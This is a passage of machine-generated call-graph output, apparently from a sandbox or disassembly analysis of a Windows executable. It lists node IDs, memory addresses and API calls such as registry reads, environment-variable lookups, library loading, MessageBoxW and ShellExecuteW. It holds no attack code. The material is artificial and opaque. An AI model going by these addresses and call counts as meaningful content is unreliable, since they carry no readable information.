7392->7392 7393 7ff68d5e6070 5 API calls 7392->7393 7394 7ff68d5e8814 7393->7394 7395 7ff68d5e8866 7394->7395 7396 7ff68d5e8850 toupper 7394->7396 7397 7ff68d5e9250 5 API calls 7395->7397 7396->7395 7396->7396 7398 7ff68d5e887d 7397->7398 7399 7ff68d5e88de 7398->7399 7402 7ff68d5e88d7 _invalid_parameter_noinfo_noreturn 7398->7402 7499 7ff68d5e5620 7399->7499 7401 7ff68d5e88f0 7403 7ff68d5e8930 7401->7403 7404 7ff68d5e8929 _invalid_parameter_noinfo_noreturn 7401->7404 7402->7399 7508 7ff68d5e8380 7403->7508 7404->7403 7407 7ff68d5e8952 GetCurrentProcess IsWow64Process 7411 7ff68d5e896f 7407->7411 7418 7ff68d5e89cd 7407->7418 7408 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7409 7ff68d5e8a39 7408->7409 7409->7123 7409->7124 7410 7ff68d5e6600 5 API calls 7413 7ff68d5e89d8 _Yarn 7410->7413 7412 7ff68d5e6600 5 API calls 7411->7412 7414 7ff68d5e897d _Yarn 7411->7414 7411->7418 7412->7414 7415 7ff68d5e8380 56 API calls 7413->7415 7417 7ff68d5e8380 56 API calls 7414->7417 7416 7ff68d5e8a28 7415->7416 7416->7408 7417->7418 7418->7410 7418->7413 7418->7416 7420 7ff68d5ec691 7419->7420 7534 7ff68d5ec810 7420->7534 7423 7ff68d5ebbac GetCurrentProcess IsWow64Process 7422->7423 7424 7ff68d5ebb5c GetEnvironmentVariableW 7422->7424 7427 7ff68d5ebbc9 7423->7427 7425 7ff68d5ebbf5 7424->7425 7426 7ff68d5ebb7d GetLastError 7424->7426 7429 7ff68d5ebc10 GetEnvironmentVariableW 7425->7429 7426->7423 7428 7ff68d5ebb8a 7426->7428 7430 7ff68d5e8380 56 API calls 7427->7430 7431 7ff68d5e7a60 3 API calls 7428->7431 7429->7426 7436 7ff68d5ebc2e 7429->7436 7432 7ff68d5ebbe6 7430->7432 7431->7423 7433 7ff68d5e7dd0 16 API calls 7432->7433 7445 7ff68d5ebbee _Yarn 7432->7445 7437 7ff68d5ebcf4 7433->7437 7434 7ff68d5ebd4e 7438 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7434->7438 7435 7ff68d5ebc45 _Yarn 7435->7445 7446 7ff68d5e6600 5 API calls 7435->7446 7436->7435 7439 7ff68d5e6600 5 API calls 7436->7439 7580 7ff68d5ed920 LoadLibraryExW 7437->7580 7442 7ff68d5ebd63 7438->7442 7439->7435 7441 7ff68d5ebd47 _invalid_parameter_noinfo_noreturn 7441->7434 7442->7156 7443 7ff68d5ebcf9 7444 7ff68d5e7dd0 16 API calls 7443->7444 7443->7445 7444->7445 7445->7434 7445->7441 7446->7445 7448 7ff68d5e6070 5 API calls 7447->7448 7449 7ff68d5ebde9 7448->7449 7450 7ff68d5ebe15 GetEnvironmentVariableW 7449->7450 7492 7ff68d5ec140 7449->7492 7451 7ff68d5ebe75 7450->7451 7452 7ff68d5ebe3f GetLastError 7450->7452 7457 7ff68d5ebe89 GetEnvironmentVariableW 7451->7457 7454 7ff68d5ebe4c 7452->7454 7466 7ff68d5ebe6e _Yarn 7452->7466 7453 7ff68d5e6070 5 API calls 7455 7ff68d5ec172 7453->7455 7459 7ff68d5e7a60 3 API calls 7454->7459 7456 7ff68d5e9250 5 API calls 7455->7456 7458 7ff68d5ec193 7456->7458 7457->7452 7467 7ff68d5ebea3 7457->7467 7460 7ff68d5e5500 5 API calls 7458->7460 7459->7466 7462 7ff68d5ec1da 7460->7462 7461 7ff68d5e6070 5 API calls 7463 7ff68d5ebf2b 7461->7463 7464 7ff68d5e5620 3 API calls 7462->7464 7465 7ff68d5e6070 5 API calls 7463->7465 7469 7ff68d5ec207 7464->7469 7475 7ff68d5ebf67 7465->7475 7466->7461 7466->7492 7467->7466 7468 7ff68d5e6600 5 API calls 7467->7468 7468->7466 7470 7ff68d5ec245 7469->7470 7473 7ff68d5ec23e _invalid_parameter_noinfo_noreturn 7469->7473 7471 7ff68d5ec289 7470->7471 7474 7ff68d5ec282 _invalid_parameter_noinfo_noreturn 7470->7474 7472 7ff68d5ec2de 7471->7472 7481 7ff68d5ec2d7 _invalid_parameter_noinfo_noreturn 7471->7481 7476 7ff68d5ec32e 7472->7476 7486 7ff68d5ec327 _invalid_parameter_noinfo_noreturn 7472->7486 7473->7470 7474->7471 7478 7ff68d5ec08e _invalid_parameter_noinfo_noreturn 7475->7478 7479 7ff68d5ec3ac 7475->7479 7480 7ff68d5ec028 7475->7480 7485 7ff68d5ec095 7475->7485 7477 7ff68d5ec387 7476->7477 7487 7ff68d5ec380 _invalid_parameter_noinfo_noreturn 7476->7487 7482 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7477->7482 7478->7485 7484 7ff68d5e5ec0 3 API calls 7479->7484 7483 7ff68d5e6070 5 API calls 7480->7483 7481->7472 7489 7ff68d5ec398 7482->7489 7490 7ff68d5ec055 7483->7490 7491 7ff68d5ec3b1 7484->7491 7488 7ff68d5e6600 5 API calls 7485->7488 7493 7ff68d5ec0d2 _Yarn 7485->7493 7486->7476 7487->7477 7488->7493 7495 7ff68d5ec3c0 7489->7495 7490->7478 7490->7485 7492->7453 7493->7492 7494 7ff68d5ec139 _invalid_parameter_noinfo_noreturn 7493->7494 7494->7492 7496 7ff68d5ec410 7495->7496 7496->7496 7497 7ff68d5e1460 3 API calls 7496->7497 7498 7ff68d5ec5e8 7497->7498 7500 7ff68d5e5635 7499->7500 7501 7ff68d5e5668 7499->7501 7500->7501 7502 7ff68d5e56ac _invalid_parameter_noinfo_noreturn 7500->7502 7501->7401 7503 7ff68d5e56d3 7502->7503 7504 7ff68d5e56f7 7502->7504 7503->7504 7505 7ff68d5e5718 _invalid_parameter_noinfo_noreturn 7503->7505 7504->7401 7530 7ff68d5e5a60 7505->7530 7507 7ff68d5e5743 7507->7401 7509 7ff68d5e83c2 GetEnvironmentVariableW 7508->7509 7510 7ff68d5e83bf 7508->7510 7511 7ff68d5e83f3 GetLastError 7509->7511 7512 7ff68d5e8427 7509->7512 7510->7509 7513 7ff68d5e8404 7511->7513 7528 7ff68d5e8422 _Yarn 7511->7528 7514 7ff68d5e8442 GetEnvironmentVariableW 7512->7514 7515 7ff68d5e7a60 3 API calls 7513->7515 7514->7511 7520 7ff68d5e8458 7514->7520 7515->7528 7516 7ff68d5e8587 7517 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7516->7517 7519 7ff68d5e859c 7517->7519 7518 7ff68d5e8580 _invalid_parameter_noinfo_noreturn 7518->7516 7519->7407 7519->7416 7521 7ff68d5e6600 5 API calls 7520->7521 7522 7ff68d5e8475 _Yarn 7520->7522 7521->7522 7523 7ff68d5ecd20 47 API calls 7522->7523 7524 7ff68d5e84c5 7523->7524 7525 7ff68d5e8525 7524->7525 7526 7ff68d5e84c9 7524->7526 7527 7ff68d5e7670 2 API calls 7525->7527 7526->7528 7529 7ff68d5e6600 5 API calls 7526->7529 7527->7528 7528->7516 7528->7518 7529->7528 7531 7ff68d5e5a89 7530->7531 7533 7ff68d5e5ae2 7530->7533 7532 7ff68d5e5b3c _invalid_parameter_noinfo_noreturn 7531->7532 7531->7533 7533->7507 7535 7ff68d5ec84a 7534->7535 7536 7ff68d5ebd80 32 API calls 7535->7536 7537 7ff68d5ec87b 7536->7537 7538 7ff68d5ec8f5 RegOpenKeyExW 7537->7538 7541 7ff68d5ec3c0 3 API calls 7537->7541 7539 7ff68d5ec95e RegGetValueW 7538->7539 7540 7ff68d5ec927 7538->7540 7545 7ff68d5ec993 7539->7545 7546 7ff68d5ecadc 7539->7546 7542 7ff68d5ec92c 7540->7542 7543 7ff68d5ec94b 7540->7543 7544 7ff68d5ec899 7541->7544 7549 7ff68d5e7670 2 API calls 7542->7549 7550 7ff68d5e7670 2 API calls 7543->7550 7554 7ff68d5e7670 2 API calls 7544->7554 7545->7546 7547 7ff68d5ec99e 7545->7547 7548 7ff68d5e7670 2 API calls 7546->7548 7551 7ff68d5ec9bb 7547->7551 7558 7ff68d5ec9f2 7547->7558 7559 7ff68d5ec9c9 7547->7559 7552 7ff68d5ecaea RegCloseKey 7548->7552 7553 7ff68d5ec946 7549->7553 7550->7553 7555 7ff68d5eca20 RegGetValueW 7551->7555 7578 7ff68d5ecacb _invalid_parameter_noinfo_noreturn 7551->7578 7552->7553 7564 7ff68d5ecb35 7553->7564 7576 7ff68d5ecb2e _invalid_parameter_noinfo_noreturn 7553->7576 7556 7ff68d5ec8b2 7554->7556 7557 7ff68d5eca4d 7555->7557 7561 7ff68d5eca6a 7555->7561 7556->7538 7568 7ff68d5ec8e9 _invalid_parameter_noinfo_noreturn 7556->7568 7569 7ff68d5ec8f0 7556->7569 7560 7ff68d5e7670 2 API calls 7557->7560 7565 7ff68d5f0d08 std::_Facet_Register 4 API calls 7558->7565 7562 7ff68d5ecb61 7559->7562 7563 7ff68d5ec9d6 7559->7563 7567 7ff68d5eca5b RegCloseKey 7560->7567 7570 7ff68d5eca75 RegCloseKey 7561->7570 7566 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7562->7566 7571 7ff68d5f0d08 std::_Facet_Register 4 API calls 7563->7571 7572 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7564->7572 7565->7551 7573 7ff68d5ecb66 7566->7573 7574 7ff68d5eca98 7567->7574 7568->7569 7569->7538 7575 7ff68d5eca86 7570->7575 7571->7551 7577 7ff68d5ecb4a 7572->7577 7574->7553 7574->7578 7579 7ff68d5e7670 2 API calls 7575->7579 7576->7564 7578->7553 7579->7574 7581 7ff68d5ed93e GetLastError 7580->7581 7582 7ff68d5ed959 GetProcAddress 7580->7582 7585 7ff68d5e7720 3 API calls 7581->7585 7583 7ff68d5ed9aa 7582->7583 7584 7ff68d5ed976 GetCurrentProcess 7582->7584 7583->7443 7587 7ff68d5ed992 7584->7587 7586 7ff68d5ed952 7585->7586 7586->7443 7588 7ff68d5ed9b6 7587->7588 7589 7ff68d5ed996 GetLastError 7587->7589 7588->7443 7590 7ff68d5e7720 3 API calls 7589->7590 7590->7583 7592 7ff68d5e6070 5 API calls 7591->7592 7593 7ff68d5e8aac 7592->7593 7594 7ff68d5e62b0 5 API calls 7593->7594 7595 7ff68d5e8ac7 _Yarn 7593->7595 7594->7595 7596 7ff68d5e62b0 5 API calls 7595->7596 7597 7ff68d5e8b29 _Yarn 7595->7597 7596->7597 7598 7ff68d5e5500 5 API calls 7597->7598 7599 7ff68d5e8b86 7598->7599 7600 7ff68d5e62b0 5 API calls 7599->7600 7601 7ff68d5e8b9a _Yarn 7599->7601 7600->7601 7622 7ff68d5e81b0 GetEnvironmentVariableW 7601->7622 7605 7ff68d5e8bfd 7606 7ff68d5e8c3c 7605->7606 7609 7ff68d5e8c35 _invalid_parameter_noinfo_noreturn 7605->7609 7642 7ff68d5ecb70 7606->7642 7609->7606 7610 7ff68d5e6070 5 API calls 7612 7ff68d5e8c77 7610->7612 7611 7ff68d5e62b0 5 API calls 7613 7ff68d5e8ce5 7611->7613 7614 7ff68d5e8cbc 7612->7614 7615 7ff68d5e8cb5 _invalid_parameter_noinfo_noreturn 7612->7615 7616 7ff68d5e62b0 5 API calls 7613->7616 7619 7ff68d5e8d50 _Yarn 7613->7619 7614->7611 7614->7613 7615->7614 7616->7619 7617 7ff68d5e8dce 7618 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7617->7618 7620 7ff68d5e8de2 7618->7620 7619->7617 7621 7ff68d5e8dc7 _invalid_parameter_noinfo_noreturn 7619->7621 7620->7207 7621->7617 7623 7ff68d5e8210 7622->7623 7624 7ff68d5e8249 GetLastError 7622->7624 7627 7ff68d5e822b GetEnvironmentVariableW 7623->7627 7625 7ff68d5e8278 7624->7625 7626 7ff68d5e8256 7624->7626 7628 7ff68d5e6070 5 API calls 7625->7628 7630 7ff68d5e7a60 3 API calls 7626->7630 7627->7624 7629 7ff68d5e82f0 7627->7629 7631 7ff68d5e829b 7628->7631 7629->7629 7633 7ff68d5e6600 5 API calls 7629->7633 7636 7ff68d5e82e0 _Yarn 7629->7636 7630->7625 7635 7ff68d5e82d9 _invalid_parameter_noinfo_noreturn 7631->7635 7631->7636 7632 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7634 7ff68d5e836a 7632->7634 7633->7636 7637 7ff68d5e5590 7634->7637 7635->7636 7636->7632 7638 7ff68d5e55a3 7637->7638 7639 7ff68d5e62b0 5 API calls 7638->7639 7640 7ff68d5e55bd _Yarn 7638->7640 7641 7ff68d5e5611 7639->7641 7640->7605 7641->7605 7666 7ff68d5f58a0 7642->7666 7645 7ff68d5ecbf5 GetProcAddress 7646 7ff68d5ecc59 7645->7646 7649 7ff68d5ecc0e 7645->7649 7647 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7646->7647 7648 7ff68d5e8c4a 7647->7648 7648->7610 7648->7614 7649->7646 7650 7ff68d5ecc40 7649->7650 7651 7ff68d5ecc7d 7649->7651 7652 7ff68d5ecc6f 7650->7652 7653 7ff68d5ecc48 7650->7653 7651->7646 7654 7ff68d5e5500 5 API calls 7651->7654 7657 7ff68d5e5500 5 API calls 7652->7657 7655 7ff68d5ecc5e 7653->7655 7656 7ff68d5ecc4d 7653->7656 7658 7ff68d5ecc91 7654->7658 7660 7ff68d5e5500 5 API calls 7655->7660 7659 7ff68d5e5500 5 API calls 7656->7659 7657->7646 7668 7ff68d5e9720 7658->7668 7659->7646 7660->7646 7663 7ff68d5e5590 5 API calls 7664 7ff68d5ecca9 7663->7664 7664->7646 7665 7ff68d5ecce3 _invalid_parameter_noinfo_noreturn 7664->7665 7665->7646 7667 7ff68d5ecbd7 LoadLibraryA 7666->7667 7667->7645 7667->7646 7669 7ff68d5e9749 7668->7669 7674 7ff68d5eb510 7669->7674 7671 7ff68d5e97d0 7672 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7671->7672 7673 7ff68d5e97e0 7672->7673 7673->7663 7675 7ff68d5eb558 7674->7675 7682 7ff68d5eb547 _Yarn 7674->7682 7676 7ff68d5eb65b 7675->7676 7679 7ff68d5eb571 7675->7679 7677 7ff68d5e1460 3 API calls 7676->7677 7678 7ff68d5eb660 7677->7678 7681 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7678->7681 7679->7678 7680 7ff68d5eb616 7679->7680 7679->7682 7684 7ff68d5eb5c8 7679->7684 7683 7ff68d5f0d08 std::_Facet_Register 4 API calls 7680->7683 7685 7ff68d5eb666 7681->7685 7682->7671 7683->7682 7686 7ff68d5f0d08 std::_Facet_Register 4 API calls 7684->7686 7687 7ff68d5eb5d0 7686->7687 7687->7682 7688 7ff68d5eb60f _invalid_parameter_noinfo_noreturn 7687->7688 7688->7680 7690 7ff68d5e62b0 5 API calls 7689->7690 7691 7ff68d5e24b9 7690->7691 7692 7ff68d5e62b0 5 API calls 7691->7692 7693 7ff68d5e24cd _Yarn 7691->7693 7692->7693 7694 7ff68d5e5500 5 API calls 7693->7694 7695 7ff68d5e252d 7694->7695 7696 7ff68d5e62b0 5 API calls 7695->7696 7697 7ff68d5e254b 7695->7697 7696->7697 7698 7ff68d5e62b0 5 API calls 7697->7698 7699 7ff68d5e2592 _Yarn 7697->7699 7698->7699 7700 7ff68d5e5500 5 API calls 7699->7700 7701 7ff68d5e25f2 7700->7701 7702 7ff68d5e62b0 5 API calls 7701->7702 7703 7ff68d5e2605 7701->7703 7702->7703 7704 7ff68d5e62b0 5 API calls 7703->7704 7705 7ff68d5e264c _Yarn 7703->7705 7704->7705 7706 7ff68d5e26d5 _Yarn 7705->7706 7707 7ff68d5e62b0 5 API calls 7705->7707 7708 7ff68d5e272f 7706->7708 7709 7ff68d5e62b0 5 API calls 7706->7709 7707->7706 7710 7ff68d5e2762 ReportEventW DeregisterEventSource 7708->7710 7709->7710 7711 7ff68d5e27ef 7710->7711 7712 7ff68d5e27bb 7710->7712 7713 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7711->7713 7712->7711 7714 7ff68d5e27e8 _invalid_parameter_noinfo_noreturn 7712->7714 7715 7ff68d5e2800 GetModuleHandleW 7713->7715 7714->7711 7715->6789 7715->6790 7717 7ff68d5e318f 7716->7717 7718 7ff68d5e3157 GetLastError 7716->7718 7722 7ff68d5e31a3 GetEnvironmentVariableW 7717->7722 7719 7ff68d5e318a 7718->7719 7720 7ff68d5e3168 7718->7720 7721 7ff68d5e3446 7719->7721 7835 7ff68d5e2a20 7719->7835 7726 7ff68d5e7a60 3 API calls 7720->7726 7724 7ff68d5e3453 7721->7724 7725 7ff68d5e3a7c 7721->7725 7727 7ff68d5e31bd GetLastError 7722->7727 7736 7ff68d5e31f2 7722->7736 7729 7ff68d5e5170 41 API calls 7724->7729 7731 7ff68d5e5170 41 API calls 7725->7731 7776 7ff68d5e41f3 7725->7776 7726->7719 7727->7719 7728 7ff68d5e31ce 7727->7728 7733 7ff68d5e7a60 3 API calls 7728->7733 7730 7ff68d5e347d 7729->7730 7734 7ff68d5e68b0 19 API calls 7730->7734 7735 7ff68d5e3aac 7731->7735 7732 7ff68d5e429a 7744 7ff68d5e42e8 _invalid_parameter_noinfo_noreturn 7732->7744 7751 7ff68d5e42ef 7732->7751 7733->7719 7805 7ff68d5e3492 _Yarn 7734->7805 7742 7ff68d5e68b0 19 API calls 7735->7742 7740 7ff68d5e6600 5 API calls 7736->7740 7746 7ff68d5e3208 _Yarn 7736->7746 7737 7ff68d5e3373 7842 7ff68d5e5170 7737->7842 7738 7ff68d5e4293 _invalid_parameter_noinfo_noreturn 7738->7732 7740->7746 7741 7ff68d5e32b6 7741->7737 7747 7ff68d5e336c _invalid_parameter_noinfo_noreturn 7741->7747 7809 7ff68d5e3abe _Yarn 7742->7809 7744->7751 7745 7ff68d5e4345 7752 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7745->7752 7757 7ff68d5e3247 _wtoi 7746->7757 7747->7737 7748 7ff68d5e39a4 7749 7ff68d5e2a20 6 API calls 7748->7749 7777 7ff68d5e39d4 7748->7777 7755 7ff68d5e39bc 7749->7755 7751->7745 7756 7ff68d5e433e _invalid_parameter_noinfo_noreturn 7751->7756 7758 7ff68d5e4359 7752->7758 7753 7ff68d5e3519 wcsncmp 7753->7805 7754 7ff68d5e420a 7759 7ff68d5e4380 _invalid_parameter_noinfo_noreturn 7754->7759 7762 7ff68d5e5590 5 API calls 7755->7762 7756->7745 7757->7719 7757->7751 7758->6790 7766 7ff68d5e4216 7759->7766 7760 7ff68d5e3adc wcsncmp 7760->7809 7761 7ff68d5e3553 wcsncmp 7761->7805 7767 7ff68d5e39ca 7762->7767 7763 7ff68d5e68b0 19 API calls 7763->7809 7764 7ff68d5e33ef 7882 7ff68d5e4380 7764->7882 7765 7ff68d5e3834 wcsncmp 7765->7805 7766->7776 7780 7ff68d5e424f _invalid_parameter_noinfo_noreturn 7766->7780 7885 7ff68d5e1250 7767->7885 7769 7ff68d5e2820 20 API calls 7769->7805 7770 7ff68d5e2a20 6 API calls 7770->7809 7772 7ff68d5e3d86 7772->7754 7778 7ff68d5e3d8f 7772->7778 7774 7ff68d5e4374 7779 7ff68d5e5ec0 3 API calls 7774->7779 7775 7ff68d5e33fb 7790 7ff68d5e343f _invalid_parameter_noinfo_noreturn 7775->7790 7798 7ff68d5e3a28 7775->7798 7776->7732 7776->7738 7785 7ff68d5e4380 _invalid_parameter_noinfo_noreturn 7777->7785 7781 7ff68d5e4380 _invalid_parameter_noinfo_noreturn 7778->7781 7783 7ff68d5e4379 7779->7783 7780->7776 7786 7ff68d5e3d9b 7781->7786 7782 7ff68d5e33ac 7782->7764 7788 7ff68d5e68b0 19 API calls 7782->7788 7862 7ff68d5e2820 7782->7862 7784 7ff68d5e68b0 19 API calls 7784->7805 7793 7ff68d5e39e1 7785->7793 7786->7780 7786->7798 7787 7ff68d5e8a50 29 API calls 7787->7809 7788->7782 7789 7ff68d5e5590 5 API calls 7789->7805 7790->7721 7791 7ff68d5e62b0 5 API calls 7794 7ff68d5e3a47 _Yarn 7791->7794 7792 7ff68d5e3de6 _invalid_parameter_noinfo_noreturn 7796 7ff68d5e3ded _invalid_parameter_noinfo_noreturn 7792->7796 7793->7798 7800 7ff68d5e3a1a _invalid_parameter_noinfo_noreturn 7793->7800 7797 7ff68d5e7670 2 API calls 7794->7797 7795 7ff68d5e6070 _invalid_parameter_noinfo_noreturn malloc free RtlPcToFileHeader RaiseException 7795->7805 7796->7798 7799 7ff68d5e3e48 GetWindowsDirectoryW 7797->7799 7798->7791 7798->7794 7803 7ff68d5e3ffc GetLastError 7799->7803 7804 7ff68d5e3e67 7799->7804 7801 7ff68d5e3a21 _invalid_parameter_noinfo_noreturn 7800->7801 7801->7798 7802 7ff68d5e62b0 _invalid_parameter_noinfo_noreturn malloc free RtlPcToFileHeader RaiseException 7802->7805 7806 7ff68d5e7670 2 API calls 7803->7806 7808 7ff68d5e6070 5 API calls 7804->7808 7805->7748 7805->7753 7805->7761 7805->7765 7805->7769 7805->7774 7805->7784 7805->7789 7805->7795 7805->7801 7805->7802 7827 7ff68d5e3f52 7806->7827 7807 7ff68d5e62b0 _invalid_parameter_noinfo_noreturn malloc free RtlPcToFileHeader RaiseException 7807->7809 7810 7ff68d5e3e9e 7808->7810 7809->7754 7809->7760 7809->7763 7809->7770 7809->7772 7809->7787 7809->7792 7809->7796 7809->7807 7812 7ff68d5e7dd0 16 API calls 7810->7812 7811 7ff68d5e6070 5 API calls 7813 7ff68d5e403b 7811->7813 7814 7ff68d5e3eb0 CreateActCtxW 7812->7814 7815 7ff68d5e4054 7813->7815 7819 7ff68d5e62b0 5 API calls 7813->7819 7816 7ff68d5e3eed GetLastError 7814->7816 7817 7ff68d5e3f5c ActivateActCtx 7814->7817 7823 7ff68d5e62b0 5 API calls 7815->7823 7825 7ff68d5e40b8 _Yarn 7815->7825 7820 7ff68d5e7670 2 API calls 7816->7820 7818 7ff68d5e3f6e GetLastError 7817->7818 7828 7ff68d5e3f15 7817->7828 7821 7ff68d5e7670 2 API calls 7818->7821 7819->7815 7820->7828 7821->7828 7822 7ff68d5e3fc3 7891 7ff68d5e2db0 LoadLibraryExW 7822->7891 7823->7825 7829 7ff68d5e4110 _Yarn 7825->7829 7830 7ff68d5e62b0 5 API calls 7825->7830 7826 7ff68d5e3fbc _invalid_parameter_noinfo_noreturn 7826->7822 7827->7776 7827->7811 7828->7822 7828->7826 7828->7827 7831 7ff68d5e4163 MessageBoxW 7829->7831 7830->7831 7832 7ff68d5e41b5 7831->7832 7833 7ff68d5e4187 ShellExecuteW 7831->7833 7832->7776 7834 7ff68d5e41ec _invalid_parameter_noinfo_noreturn 7832->7834 7833->7832 7834->7776 7836 7ff68d5e6070 5 API calls 7835->7836 7837 7ff68d5e2a62 7836->7837 7838 7ff68d5e62b0 5 API calls 7837->7838 7839 7ff68d5e2a7e _Yarn 7837->7839 7838->7839 7840 7ff68d5e62b0 5 API calls 7839->7840 7841 7ff68d5e2adf _Yarn 7839->7841 7840->7841 7841->7741 7914 7ff68d5e5d30 7842->7914 7845 7ff68d5f0d08 std::_Facet_Register 4 API calls 7846 7ff68d5e52e9 7845->7846 7926 7ff68d5f044c 7846->7926 7850 7ff68d5e339b 7851 7ff68d5e68b0 7850->7851 7852 7ff68d5e6901 7851->7852 8108 7ff68d5e6c50 7852->8108 7854 7ff68d5e6aa8 7854->7782 7855 7ff68d5e6990 7855->7854 7856 7ff68d5e2180 18 API calls 7855->7856 7857 7ff68d5e6b1b 7856->7857 7859 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 7857->7859 7858 7ff68d5e6917 7858->7855 7860 7ff68d5e5ee0 5 API calls 7858->7860 7861 7ff68d5e6b2c 7859->7861 7860->7858 7861->7782 7863 7ff68d5e28d2 7862->7863 7864 7ff68d5e28a2 wcsncmp 7862->7864 7866 7ff68d5e2942 wcsncmp 7863->7866 7880 7ff68d5e28cb 7863->7880 7864->7863 7867 7ff68d5e28c0 7864->7867 7868 7ff68d5e295d 7866->7868 7866->7880 7870 7ff68d5e5480 5 API calls 7867->7870 7871 7ff68d5e2a15 7868->7871 7872 7ff68d5e2980 7868->7872 7869 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7873 7ff68d5e2a00 7869->7873 7870->7880 7874 7ff68d5e5ec0 3 API calls 7871->7874 7875 7ff68d5e6070 5 API calls 7872->7875 7873->7782 7876 7ff68d5e2a1a 7874->7876 7877 7ff68d5e2998 7875->7877 7878 7ff68d5e5620 3 API calls 7877->7878 7879 7ff68d5e29a5 7878->7879 7879->7880 7881 7ff68d5e29de _invalid_parameter_noinfo_noreturn 7879->7881 7880->7869 7881->7880 7883 7ff68d5e5a60 _invalid_parameter_noinfo_noreturn 7882->7883 7884 7ff68d5e43df 7883->7884 7884->7775 7886 7ff68d5e1263 7885->7886 7887 7ff68d5e128c 7885->7887 7886->7887 7888 7ff68d5e12ab _invalid_parameter_noinfo_noreturn 7886->7888 7887->7777 7889 7ff68d5f2504 Concurrency::cancel_current_task free 7888->7889 7890 7ff68d5e12e9 7889->7890 7890->7777 7892 7ff68d5e2e1f 7891->7892 7893 7ff68d5e2dfe GetProcAddress 7891->7893 7896 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7892->7896 7894 7ff68d5e2e26 7893->7894 7895 7ff68d5e2e16 FreeLibrary 7893->7895 7897 7ff68d5e2e38 GetModuleHandleW FindResourceW 7894->7897 7895->7892 7898 7ff68d5e308b 7896->7898 7899 7ff68d5e2e7e 7897->7899 7898->7827 7900 7ff68d5e6070 5 API calls 7899->7900 7901 7ff68d5e2ef6 7900->7901 7902 7ff68d5e62b0 5 API calls 7901->7902 7903 7ff68d5e2f0b _Yarn 7901->7903 7902->7903 8139 7ff68d5e2b80 7903->8139 7906 7ff68d5e62b0 5 API calls 7907 7ff68d5e2f80 _Yarn 7906->7907 7908 7ff68d5e2b80 6 API calls 7907->7908 7910 7ff68d5e2fdd 7908->7910 7909 7ff68d5e302f FreeLibrary 7909->7892 7911 7ff68d5e3043 7909->7911 7910->7909 8151 7ff68d5e2b50 ShellExecuteW 7910->8151 7911->7892 7913 7ff68d5e3070 _invalid_parameter_noinfo_noreturn 7911->7913 7913->7892 7915 7ff68d5f0d08 std::_Facet_Register 4 API calls 7914->7915 7916 7ff68d5e5db2 7915->7916 7917 7ff68d5f044c 9 API calls 7916->7917 7918 7ff68d5e5dbc 7917->7918 7952 7ff68d5e6770 7918->7952 7920 7ff68d5e5222 7920->7845 7921 7ff68d5e5df0 7921->7920 7966 7ff68d5e2180 7921->7966 7924 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 7925 7ff68d5e5eb6 7924->7925 7927 7ff68d5f046e std::_Lockit::_Lockit 7926->7927 7937 7ff68d5f04d9 _Yarn 7927->7937 8092 7ff68d5f0644 7927->8092 7930 7ff68d5eff94 std::_Lockit::~_Lockit _unlock_locales 7932 7ff68d5e52f3 7930->7932 7938 7ff68d5e5bd0 7932->7938 7934 7ff68d5f04b2 malloc 7934->7937 7935 7ff68d5f04ad free 7935->7934 7937->7930 7939 7ff68d5e5d1b 7938->7939 7942 7ff68d5e5bf8 7938->7942 7940 7ff68d5f01f8 Concurrency::cancel_current_task 2 API calls 7939->7940 7941 7ff68d5e5d21 7940->7941 7943 7ff68d5e5c5a 7942->7943 7945 7ff68d5e5c3b 7942->7945 7946 7ff68d5e5d16 7942->7946 7949 7ff68d5e5c21 _Yarn 7942->7949 7944 7ff68d5f0d08 std::_Facet_Register 4 API calls 7943->7944 7944->7949 7948 7ff68d5f0d08 std::_Facet_Register 4 API calls 7945->7948 7947 7ff68d5e13c0 Concurrency::cancel_current_task 3 API calls 7946->7947 7947->7939 7950 7ff68d5e5c40 7948->7950 7949->7850 7950->7949 7951 7ff68d5e5c53 _invalid_parameter_noinfo_noreturn 7950->7951 7951->7943 7953 7ff68d5e678a std::_Lockit::_Lockit 7952->7953 7954 7ff68d5e67d9 7953->7954 7976 7ff68d5eff94 7953->7976 7965 7ff68d5e6826 7954->7965 7980 7ff68d5e1b70 7954->7980 7955 7ff68d5eff94 std::_Lockit::~_Lockit _unlock_locales 7957 7ff68d5e6871 7955->7957 7957->7921 7960 7ff68d5e687f 8015 7ff68d5e1a80 7960->8015 7961 7ff68d5e683e 8012 7ff68d5f040c 7961->8012 7965->7955 7967 7ff68d5e21c0 7966->7967 7968 7ff68d5e61a0 5 API calls 7967->7968 7969 7ff68d5e21d4 7968->7969 8041 7ff68d5e1560 7969->8041 7971 7ff68d5e21ed 7972 7ff68d5e2229 7971->7972 7974 7ff68d5e2222 _invalid_parameter_noinfo_noreturn 7971->7974 7973 7ff68d5f0ce0 __GSHandlerCheck_EH 8 API calls 7972->7973 7975 7ff68d5e2248 7973->7975 7974->7972 7975->7924 7977 7ff68d5eff9f _unlock_locales 7976->7977 7978 7ff68d5effa8 7976->7978 7978->7954 7981 7ff68d5e1b9c 7980->7981 8011 7ff68d5e1cfe 7980->8011 7982 7ff68d5f0d08 std::_Facet_Register 4 API calls 7981->7982 7981->8011 7983 7ff68d5e1baf std::_Lockit::_Lockit 7982->7983 7984 7ff68d5e1d1c 7983->7984 7985 7ff68d5e1c1c 7983->7985 8027 7ff68d5f0284 7984->8027 8021 7ff68d5f05bc 7985->8021 8011->7960 8011->7961 8013 7ff68d5f0d08 std::_Facet_Register 4 API calls 8012->8013 8014 7ff68d5f041f 8013->8014 8014->7965 8016 7ff68d5e1a8e Concurrency::cancel_current_task 8015->8016 8017 7ff68d5f25ec Concurrency::cancel_current_task 2 API calls 8016->8017 8018 7ff68d5e1a9f 8017->8018 8019 